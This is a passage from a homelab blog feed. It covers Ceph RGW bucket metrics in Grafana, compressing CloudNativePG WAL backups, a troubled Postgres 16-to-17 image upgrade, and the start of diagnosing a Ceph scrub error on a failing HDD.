         alt="A screenshot of two more Grafana time series plots. This time, they&#39;re stacked area plots. The first one shows the sizes of buckets in bytes. The overall size being about 1.6 TB. The plot does not change at all over the 6 hour window shown in the screenshot. There are two significant bands for the two largest buckets, the CNPG backup bucket and the Thanos bucket. The second plot shows the number of objects in each bucket. That also shows two large bands, but this time they&#39;re different buckets which are the largest, namely my Loki logs bucket and the bucket of my Mastodon instance. Similar to the previous plot, the object counts plot also doesn&#39;t change visibly during the 6 hour window shown in the screenshot."/> <figcaption>
            <p>Plots for the size of my buckets, both in bytes and number of objects.</p>
        </figcaption>
</figure>

The setup for these plots was a bit more elaborate, because I wanted them to be
stacked area charts, so I could see the relative sizes of my buckets easily and
also see larger changes.
Their PromQL looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#75715e"># Usage in bytes</span>
</span></span><span style="display:flex;"><span>radosgw_usage_bucket_bytes
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Number of objects</span>
</span></span><span style="display:flex;"><span>radosgw_usage_bucket_objects
</span></span></code></pre></div><p>Exciting, right? &#x1f609;</p>
<p>The &ldquo;area chart&rdquo; look can be controlled by the &ldquo;Fill opacity&rdquo; in the &ldquo;Graph styles&rdquo;
section of the chart&rsquo;s configuration, and stacking can be enabled by setting
&ldquo;Stack series&rdquo; to &ldquo;normal&rdquo; in that same section.</p>
<p>Last, but certainly not least, here are some bar charts with the latest sizes of
my largest buckets:
<figure>
    <img loading="lazy" src="sizes-bar.png"
         alt="And yet another screenshot of two Grafana panels. These charts are both bar charts, each bar representing one of my S3 buckets. The first chart contains the size in bytes, the other one the number of objects. The top five buckets by size in bytes are: backup-cnpg with 588 GB, thanos with 442 GB, harbor with 130 GB, backup-audiobookshelf with 80.1 GB and backup-amun with 76.5 GB. The first five buckets by number of objects are almost entirely different. The top bucket, with 431k objects is my logs S3 bucket, followed by Mastodon with 411k, bookwyrm with 247k, then backupcnpg with a mere 30.3k and finally the harbor bucket with 26.6k. At the very end, the smallest bucket by size in bytes is the Mastodon backup bucket, at 406 MB, and the backup-postgres bucket with 280 objects at the bottom of the total number of objects chart."/> <figcaption>
            <p>Plots showing bar charts with the newest values for size in bytes and number of objects.</p>
        </figcaption>
</figure>

The first thing to note is how backup-cnpg and thanos dominate the chart by size
in bytes, and logs, mastodon and bookwyrm the chart by number of objects. I will
talk a bit more about backup-cnpg in the next section. The Thanos size is also
expected. I like my metrics, and I like to keep my metrics for extended periods
of time, and I&rsquo;m willing to spend a lot of space on that.</p>
<p>On the number of objects side of things, I was a bit surprised to see that the
top three are completely different from the size in bytes top three. But it
makes sense here, although I plan to look into Loki&rsquo;s configuration a bit, there
has to be a lot of overhead for producing that many objects. Mastodon is not
surprising at all, it just produces a lot of small objects in the cache. I was
a bit surprised by Bookwyrm though, as that doesn&rsquo;t just have a large bunch of
user-generated media to cache.</p>
<p>Finally, the PromQL for the two plots:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#75715e"># Size in bytes plot</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">sort_desc</span><span style="color:#f92672">(</span>radosgw_usage_bucket_bytes<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Size in bytes plot</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">sort_desc</span><span style="color:#f92672">(</span>radosgw_usage_bucket_objects<span style="color:#f92672">)</span>
</span></span></code></pre></div><h2 id="a-bit-of-analysis">A bit of analysis</h2>
<p>Now that the dashboard has been described in the excruciating detail my readers
love and expect, let&rsquo;s turn to getting a bit more out of it than just &ldquo;uuuuh, look at those pretty charts!&rdquo;.</p>
<p>The first interesting result is related to my nightly backups. As a reminder,
I&rsquo;m using <a href="https://restic.net/">restic</a> to push the content of my volumes into
the Ceph S3 buckets, with one bucket per app. After that&rsquo;s done for all of my
apps, I&rsquo;m copying some of those buckets onto an external HDD. I&rsquo;m currently
lacking a third, offsite backup. If you&rsquo;re interested in more details, have a
look at <a href="https://blog.mei-home.net/posts/k8s-migration-14-backup-operator/">this post</a>.</p>
<p>I&rsquo;ve now found that I&rsquo;m not bandwidth, but instead operations-limited, or that&rsquo;s
at least the way it looks.
<figure>
    <img loading="lazy" src="backups-ops.png"
         alt="A screenshot of two Grafana time series charts next to each other. The left one shows the overall ops in the RGW cluster. At the beginning of the plot, it shows below 10 ops/s, mostly get_obj. Then shortly after 03:30, the ops/s shoot up to over 350, all of it get_obj. The load stays that high for about 20 minutes, until it goes back to the previous level around 03:50. Then there&#39;s another spike at around 04:30. It also consists mostly of get_obj operations and spikes at about 310 ops/s. It is a lot shorter too, by 04:40 the ops/s have returned to below ten. The second chart then shows clearly where the ops load is coming from. During the initial, 03:30 phase, the overwhelming majority of it is from the bookwyrm bucket. The second spike at 04:30 is a lot more varied. The highest bucket is backup-cnpg, with a max of 170 ops/s, while e.g. backup-nextcloud spikes at 60 ops/s, backup-audiobookshelf at 26 ops/s and backup-paperless at 3.18 ops/s."/> <figcaption>
            <p>Operations during my backup phase.</p>
        </figcaption>
</figure>

My backup from the volumes to the S3 buckets happens at 03:30. Here, the Bookwyrm
backup seems to produce the overwhelming majority of the operations. This makes
sense, if you scroll back up a bit and look at the bar chart with the objects per
bucket. It has a total of 247k objects. Sure, the log bucket has a lot more,
but it&rsquo;s not part of the backup at all. And while Mastodon also has a lot of
objects, those are mostly under the cache prefix, which gets ignored during the
backup. But I&rsquo;ve had a look at the Bookwyrm S3 bucket, and I couldn&rsquo;t identify
anything that looked like a pure cache. I will need to dig a bit deeper and
perhaps ask the devs whether there&rsquo;s some part of the bucket I can ignore for
the backups.</p>
<p>The second, more balanced spike around 04:30 is my external backup. Here I&rsquo;m
copying some of the backup buckets onto an external HDD, treating that as a
separate &ldquo;medium&rdquo;.</p>
<p>During the same period, the actual number of bytes send and received was pretty
low:
<figure>
    <img loading="lazy" src="backups-bytes.png"
         alt="You will likely have guessed it at this point: Another screenshot of two Grafana time series charts next to each other. These two show the incoming and outgoing bytes for the overall RGW cluster. On the sending side, there is one relatively short spike of about 8 minutes around 03:30 up to 6 MB/s, with another smaller one of three minutes up to 2 MB/s around 03:50. Then there&#39;s another large spike at 04:30, boing up to 8 MB/s and lasting for another about eight minutes. On the receiving side of things, there&#39;s a long span of around 750 kB/s to 1.25 MB/s from 03:30 to 03:55. There is notably no load at 04:30."/> <figcaption>
            <p>Bytes send and received during my backups.</p>
        </figcaption>
</figure>

It is interesting that in these transmission graphs, the load from the Bookwyrm
backup is only seen on the receiving side. And then at a relatively low amount.
Looking back to the ops charts, those showed that the majority of operations were
get_obj, so I&rsquo;d expect a consistent load on the sending side. But here, the
load seems to mostly be on the receiving side of things?
The explanation here is that the bytes received spike around 03:30 is not the
Bookwyrm bucket at all, but rather the CNPG backup bucket. 03:30 is not just when
my normal backups run, but also when CNPG takes the database base backups, hence
the load.</p>
<p>Another thing worth mentioning is the total lack of any receiving activity around
the time of my external backup, 04:30. That&rsquo;s most likely due to the nature of
that backup, as it&rsquo;s only downloading the content of the backup buckets, but not
uploading anything.</p>
<p>The last thing I&rsquo;d like to bring up is the CloudNativePG backup bucket. I was
honestly pretty surprised that it&rsquo;s this big, at over 600 GB by the time I looked
at the charts for the first time. So I went spelunking a little bit and found
pretty quickly that it&rsquo;s the Write Ahead Log (WAL). For example, my Bookwyrm DB
backup looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>s3cmd du -H <span style="color:#e6db74">&#34;s3://backup-cnpg/bookwyrm-pg-cluster/wals/&#34;</span>
</span></span><span style="display:flex;"><span>94G    <span style="color:#ae81ff">6079</span> objects s3://backup-cnpg/bookwyrm-pg-cluster/wals/
</span></span><span style="display:flex;"><span>s3cmd du -H <span style="color:#e6db74">&#34;s3://backup-cnpg/bookwyrm-pg-cluster/base/&#34;</span>
</span></span><span style="display:flex;"><span> 3G      <span style="color:#ae81ff">62</span> objects s3://backup-cnpg/bookwyrm-pg-cluster/base/
</span></span></code></pre></div><p>The way CloudNativePG&rsquo;s backups work is that it continuously writes the WALs to
the backup, and taking a full base backup of the database files at configurable
points in time. I took the above example output at the beginning of October, where
I had Bookwyrm running for barely a month. And I already had 94 GB of WALs in the
backup. Sure, the system is great, as it allows me to restore to any point in
time. But to be honest, I don&rsquo;t really need that kind of granularity. Just a nightly
backup would be fine for me. But sadly, that&rsquo;s not something configurable, at
least as far as I could see.</p>
<p>So looking around, I found that I could enable compression for the WALs before
they get uploaded to the bucket, see the docs <a href="https://cloudnative-pg.io/plugin-barman-cloud/docs/compression/">here</a>.</p>
<p>And that brought quite some improvement. Here is an example from the Mastodon backups:</p>
<pre tabindex="0"><code>2025-10-04 16:36    16M  s3://backup-cnpg/mastodon-pg-cluster/wals/00000020000000F3/00000020000000F300000098
2025-10-04 16:41    16M  s3://backup-cnpg/mastodon-pg-cluster/wals/00000020000000F3/00000020000000F300000099
2025-10-04 16:46    16M  s3://backup-cnpg/mastodon-pg-cluster/wals/00000020000000F3/00000020000000F30000009A
2025-10-04 16:51    16M  s3://backup-cnpg/mastodon-pg-cluster/wals/00000020000000F3/00000020000000F30000009B
2025-10-04 16:56   248K  s3://backup-cnpg/mastodon-pg-cluster/wals/00000020000000F3/00000020000000F30000009C.bz2
2025-10-04 17:01   795K  s3://backup-cnpg/mastodon-pg-cluster/wals/00000020000000F3/00000020000000F30000009D.bz2
2025-10-04 17:06   308K  s3://backup-cnpg/mastodon-pg-cluster/wals/00000020000000F3/00000020000000F30000009E.bz2
2025-10-04 17:11   377K  s3://backup-cnpg/mastodon-pg-cluster/wals/00000020000000F3/00000020000000F30000009F.bz2
2025-10-04 17:16   831K  s3://backup-cnpg/mastodon-pg-cluster/wals/00000020000000F3/00000020000000F3000000A0.bz2
2025-10-04 17:21   421K  s3://backup-cnpg/mastodon-pg-cluster/wals/00000020000000F3/00000020000000F3000000A1.bz2
2025-10-04 17:26  1172K  s3://backup-cnpg/mastodon-pg-cluster/wals/00000020000000F3/00000020000000F3000000A2.bz2
</code></pre><p>Other databases of course don&rsquo;t produce remotely this many WALs, as there&rsquo;s nothing
as active as Mastodon in my Homelab. But the improvement is rather clear. I
opted for bzip2 compression, and it reduced the per-WAL size from pretty consistent
16 MB to mostly below 1 MB. This is quite amazing. And there don&rsquo;t seem to be
any costs associated on the computational side, looking at the CPU utilization
of the barman cloud plugin containers running next to each Postgres container:
<figure>
    <img loading="lazy" src="barman-cloud-cpu.png"
         alt="A screenshot of a Grafana time series chart. This time, it shows the CPU utilization of the plugin-barman-cloud container in my k8s cluster. It&#39;s a very noisy plot, which wildly oscillates between 0 utilization and 1.4 to 3.6. Notably, even through its noisiness, it is relatively stable, and importantly doesn&#39;t show any change in characteristics around 19:00."/> <figcaption>
            <p>CPU utilization of the plugin-barman-cloud container, which is a sidecar to each CNPG postgres container.</p>
        </figcaption>
</figure>

It&rsquo;s a bit noisy, sure, but I switched most of my CNPG Postgres clusters over to
using compression during the evening, and as you can see, there was no increase
in CPU utilization at all.</p>
<p>And if you&rsquo;re curious, at the time of writing, I&rsquo;m down to 505 GB for the CNPG
backup bucket, from over 600 GB.</p>
<p>But the reduction in storage utilization wasn&rsquo;t the only effect. It also reduced
the load on the RGW cluster. These are the bytes received for the evening I
switched over to compression for the WAL backups:
<figure>
    <img loading="lazy" src="cnpg-reduction.png"
         alt="A screenshot of two Grafana time series charts. But this time, one above the other instead of next to each other. Switching things up a bit. :-D Both plots show the same story: For most of the cumulative bytes received plot, there was a persistent stream of about 280 kB/s. This abruptly ends at around 19:30. From that point, the load is at around 1.1 kB/s, besides the occasional spikes. The other chart shows the bytes received by bucket, and here it&#39;s clear that the persistent 280 kB/s came purely from the CNPG backup bucket."/> <figcaption>
            <p>Bytes received for the RGW cluster, with me switching my CNPG clusters over to compressed WAL backups at around 19:00.</p>
        </figcaption>
</figure>
</p>
<p>From a base load of about 280 kB/s to a mere ~1.1 kB/s. A quite nice reduction in
resource usage.</p>
<p>And that&rsquo;s it folks. I hope you will forgive me the geeking out over metrics and
were able to enjoy the pretty charts.</p>
<p>(yes, about halfway through this post, I finally realized that &ldquo;chart&rdquo;,
not &ldquo;plot&rdquo; or &ldquo;graph&rdquo;, was the word I was looking for. &#x1f605;)</p>
]]></content:encoded>
    </item>
    <item>
      <title>Updating CloudNativePG Postgres Images</title>
      <link>https://blog.mei-home.net/posts/cnpg-image-updates/</link>
      <pubDate>Wed, 01 Oct 2025 22:40:58 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/cnpg-image-updates/</guid>
      <description>Switching the CloudNativePG Postgres image from the old variant to the new one using Debian as the base</description>
      <content:encoded><![CDATA[<p>In the interest of paying down a bit of technical debt in the Homelab, I
recently started to update the <a href="https://cloudnative-pg.io/">CloudNativePG</a> Postgres
images to their new variants.</p>
<p>Where before, the Postgres operand images (see the <a href="https://github.com/cloudnative-pg/postgres-containers">GitHub repo</a>)
were based on the official Postgres containers, they&rsquo;re now based on Debian and
the Debian Postgres packages.</p>
<p>With this switch, instead of just having one image per Postgres version, there
are now a few variants:</p>
<ul>
<li>Minimal: These images only contain what&rsquo;s necessary to run a CNPG Postgres instance</li>
<li>Standard: These images come with everything minimal contains, plus a few addons like PGAudit</li>
<li>System: These images are deprecated, and they are equivalent to the old image before
switching to Debian, including the Barman Cloud Plugin</li>
</ul>
<p>My main goal with this action was to switch away from the old images/system images,
as they were deprecated and will go away at some point.</p>
<p>Before I start in on how it went, one thing to mention is that it would have
been nice if there was some information available about upgrades from one
image type to another. It turns out that switching from the legacy image to the
standard image works out of the box - but the docs never said anything to that
effect anywhere.
Initially, there was even a note in the Readme stating that a switch was not
possible, but <a href="https://github.com/cloudnative-pg/postgres-containers/commit/fdc8010750dc61d2fae3e695b9dc1103978cb14f#diff-b335630551682c19a781afebcf4d07bf978fb1f8ac04c6bf87428ed5106870f5">this commit</a>
removed it.</p>
<p>To test what really works and what doesn&rsquo;t, I started out with the database cluster
for my Wallabag deployment. That&rsquo;s currently the tool in the Homelab I could live
with being down for a few days if the entire action went south.</p>
<p>As the first step, I needed to decided which precise variant of the new CNPG Postgres
images I actually wanted to use. The most important check here was to ensure that
&ldquo;bullseye&rdquo; was actually the right OS version, by running this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl exec -it -n wallabag wallabag-pg-cluster-1 -- cat /etc/os-release
</span></span></code></pre></div><p>That confirmed that the old images were based on Debian bullseye. Because the
DB was using Postgres 17.2, I tried to use <code>17.2-standard-bullseye</code>. This did not
work, and I got an image not found error. Checking a bit further, I first got
pretty annoyed with GitHub&rsquo;s package page. And I&rsquo;m honestly wondering whether
I&rsquo;m doing something wrong, because I just can&rsquo;t seem to figure out how to
search in the tags of the <a href="https://github.com/cloudnative-pg/postgres-containers/pkgs/container/postgresql">CNPG postgres-container image repo</a>.
But luckily, CNPG itself provides image lists, for example <a href="https://github.com/cloudnative-pg/artifacts/tree/main/image-catalogs">here</a>.
From that, I was able to see that the newest Postgres 17 image was 17.6, so
I entered that into my Wallabag Helm chart&rsquo;s Cluster:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wallabag-pg-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">imageName</span>: <span style="color:#e6db74">&#34;ghcr.io/cloudnative-pg/postgresql:17.6-standard-bullseye&#34;</span>
</span></span></code></pre></div><p>After a <code>helm upgrade</code> on my chart, the CNPG operator automatically switched first
the replica and then the primary over to the new image, seemingly without any
issue at all.</p>
<p>I decided to stay with bullseye for now to not do too many things at once.
Updating the OS to trixie will come in a follow-up task.</p>
<p>Then came the Harbor update, and that went utterly horribly.</p>
<p>Harbor was one of the first services I set up back when I started my migration
to k8s, as I didn&rsquo;t have it running on my Nomad-based Homelab. So it was still
on Postgres <code>16.2</code>. The first step was switching it to the new images, but still
using Postgres 16. My thinking was that it was probably a good idea to not
combine a switch of the image type with a major Postgres update. This update
went swimmingly, without any issues at all.</p>
<p>Then I switched from <code>16.10</code> to <code>17.6</code>. Major updates are <a href="https://cloudnative-pg.io/documentation/1.27/postgres_upgrades/#major-version-upgrades">supported by CNPG</a> by just updating the <code>imageName</code> in the Cluster CRD.
These major updates work offline, so the application will not be able to access
the database while the update is ongoing, which didn&rsquo;t bother me too much.</p>
<p>Initially, it looked like everything was fine. CNPG launches a major upgrade
Kubernetes Job and updates the replica(s) in the cluster first. This went through
without issue again. The problems started when CNPG tried to launch the replica,
which is seemingly always a fresh one. The Pod of the new replica never achieved
Running state, repeatedly getting restarted after a while.</p>
<p>First of all, I think the logging could be improved. Because multiple times
every second, the following message gets written to the Pod&rsquo;s logs:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">[...]</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;error_severity&#34;</span>:<span style="color:#e6db74">&#34;FATAL&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;sql_state_code&#34;</span>:<span style="color:#e6db74">&#34;57P03&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;message&#34;</span>:<span style="color:#e6db74">&#34;the database system is starting up&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">[...]</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>It just gets spammed and made the actually informative log entries difficult to
see.
Towards the end, I saw the following errors:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">[...]</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;error_severity&#34;</span>:<span style="color:#e6db74">&#34;FATAL&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;sql_state_code&#34;</span>:<span style="color:#e6db74">&#34;XX000&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;message&#34;</span>:<span style="color:#e6db74">&#34;requested timeline 41 is not a child of this server&#39;s history&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;detail&#34;</span>:<span style="color:#e6db74">&#34;Latest checkpoint is at 123/BD0019F0 on timeline 1, but in the
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">  history of the requested timeline, the server forked off from that timeline
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">  at 5/A90000A0.&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">[...]</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I initially thought that this was due to an error I had seen previously, where
the WALs on the replica&rsquo;s disk somehow got &ldquo;out of sync&rdquo; with the primary and
Postgres was unable to handle that. It sometimes happens during random node
drains for example. The prescribed solution for the problem is to delete both,
the Pod <em>and</em> the volume of the replica. This had helped previously, but didn&rsquo;t
do anything this time. After the replica started up again, I saw the same error
as above. Wondering how it was possible that a completely fresh replica would
suddenly have problems, I went through the logs again and found these lines:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">[...]</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;error_severity&#34;</span>:<span style="color:#e6db74">&#34;LOG&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;sql_state_code&#34;</span>:<span style="color:#e6db74">&#34;00000&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;message&#34;</span>:<span style="color:#e6db74">&#34;restored log file \&#34;00000002.history\&#34; from archive&#34;</span>
</span></span><span style="display:flex;"><span>  [<span style="color:#960050;background-color:#1e0010">...</span>]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>There were many more messages like this, always with different files. This
indicated to me that the replica was somehow using the backups to get itself up
to speed? And those backups were somehow wrong/broken? I had previously tested
the CNPG backups, lately after my <a href="https://blog.mei-home.net/posts/cnpg-barman-plugin-migration/">update to the Barman cloud plugin</a>.
And they were working fine for bootstrapping a fresh cluster. So I decided to
nuke them entirely, meaning I deleted the entire content of the directory for the
Harbor cluster in my CNPG backup S3 bucket. Then I deleted the Pod again, and
after a new Pod was created by the CNPG controller, the replica came up without
any further issues.</p>
<p>I&rsquo;m genuinely unsure what&rsquo;s going on here, and I have too little experience with
database management to investigate further. But it looks to me like perhaps
there&rsquo;s some issue because some of the backup files were produced by Postgres 16,
the new Postgres 17 replica was not able to handle them properly and consequently ran into
a desync?</p>
<p>This also wasn&rsquo;t just a problem specific to the Harbor Postgres cluster. I also
had to do a major update from Postgres 16 to 17 for my Grafana and Woodpecker
clusters, and they showed exactly the same issue. In both cases, deleting the
backups fixed the problem.</p>
<p>On the positive side, none of the above lead to any data loss, as the primaries
stayed up and healthy through it all. But the entire episode hasn&rsquo;t exactly
reinforced my trust in CloudNativePG.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Replacing a Broken HDD in my Ceph Cluster</title>
      <link>https://blog.mei-home.net/posts/broken-hdd/</link>
      <pubDate>Mon, 29 Sep 2025 11:20:05 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/broken-hdd/</guid>
      <description>I had to replace a broken HDD in my Ceph cluster</description>
      <content:encoded><![CDATA[<p>Back in July, I was greeted by this error on my Ceph dashboard while visiting
family:
<figure>
    <img loading="lazy" src="ceph-dashboard.png"
         alt="A screenshot of Ceph&#39;s web dashboard. It shows a Ceph error, namely an OSD_SCRUB_ERROR and a PG_DAMAGED error. It shows that the Ceph PG 13.a is inconsistent."/> <figcaption>
            <p>A Ceph error you generally don&rsquo;t want to see while you&rsquo;re 400 km away from your Homelab.</p>
        </figcaption>
</figure>
</p>
<p>This error meant that during the nightly scrub, Ceph detected an error that was
not trivially resolvable.</p>
<p>Ceph&rsquo;s nightly scrubs know two kinds: The normal scrubs, and deep scrubs.
Scrubs are run on placement groups, and normal scrubs appear very regularly. They
only compare object sizes and metadata between the primary and the secondary PGs
to ensure they&rsquo;re consistent. Deep scrubs on the other hand actually read all of
the data and compare checksums of said data, to make sure that no bits randomly
flipped. These deep scrubs are run on a weekly cadence. In my setup, scrubs are running
during the night, a couple of PGs per night.</p>
<p>This was the first time I saw these errors, so I looked at the <a href="https://docs.ceph.com/en/reef/rados/operations/health-checks/#pg-damaged">Ceph docs</a>. I followed
the links to the docs on <a href="https://docs.ceph.com/en/reef/rados/troubleshooting/troubleshooting-pg/#pgs-inconsistent">handling the error</a>.</p>
<p>The first goal was to figure out what the actual error was, and on which of the
six storage devices in my Ceph cluster it actually appeared. To figure that out,
I used the following command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph rados list-inconsistent-obj 13.a --format<span style="color:#f92672">=</span>json-pretty
</span></span></code></pre></div><p>The command produced the following output:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>  {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;epoch&#34;</span>: <span style="color:#ae81ff">9294</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;inconsistents&#34;</span>: [
</span></span><span style="display:flex;"><span>        {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;object&#34;</span>: {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;db0c7d6a-8b8b-48d5-85d8-f7f77dfac9eb.45990501.1_cache/media_attachments/files/114/881/148/093/347/525/original/8dd522a014922e6a.png&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;nspace&#34;</span>: <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;locator&#34;</span>: <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;snap&#34;</span>: <span style="color:#e6db74">&#34;head&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;version&#34;</span>: <span style="color:#ae81ff">567448</span>
</span></span><span style="display:flex;"><span>            },
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;errors&#34;</span>: [],
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;union_shard_errors&#34;</span>: [
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#34;read_error&#34;</span>
</span></span><span style="display:flex;"><span>            ],
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;selected_object_info&#34;</span>: {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;oid&#34;</span>: {
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;oid&#34;</span>: <span style="color:#e6db74">&#34;db0c7d6a-8b8b-48d5-85d8-f7f77dfac9eb.45990501.1_cache/media_attachments/files/114/881/148/093/347/525/original/8dd522a014922e6a.png&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;key&#34;</span>: <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;snapid&#34;</span>: <span style="color:#ae81ff">-2</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;hash&#34;</span>: <span style="color:#ae81ff">2980556234</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;max&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;pool&#34;</span>: <span style="color:#ae81ff">13</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;namespace&#34;</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>                },
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;version&#34;</span>: <span style="color:#e6db74">&#34;9488&#39;567448&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;prior_version&#34;</span>: <span style="color:#e6db74">&#34;0&#39;0&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;last_reqid&#34;</span>: <span style="color:#e6db74">&#34;client.63557317.0:20953500&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;user_version&#34;</span>: <span style="color:#ae81ff">567448</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;size&#34;</span>: <span style="color:#ae81ff">2607565</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;mtime&#34;</span>: <span style="color:#e6db74">&#34;2025-07-19T17:46:47.050900+0000&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;local_mtime&#34;</span>: <span style="color:#e6db74">&#34;2025-07-19T17:46:47.063177+0000&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;lost&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;flags&#34;</span>: [
</span></span><span style="display:flex;"><span>                    <span style="color:#e6db74">&#34;dirty&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#e6db74">&#34;data_digest&#34;</span>
</span></span><span style="display:flex;"><span>                ],
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;truncate_seq&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;truncate_size&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;data_digest&#34;</span>: <span style="color:#e6db74">&#34;0xb75fd373&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;omap_digest&#34;</span>: <span style="color:#e6db74">&#34;0xffffffff&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;expected_object_size&#34;</span>: <span style="color:#ae81ff">0</span>,
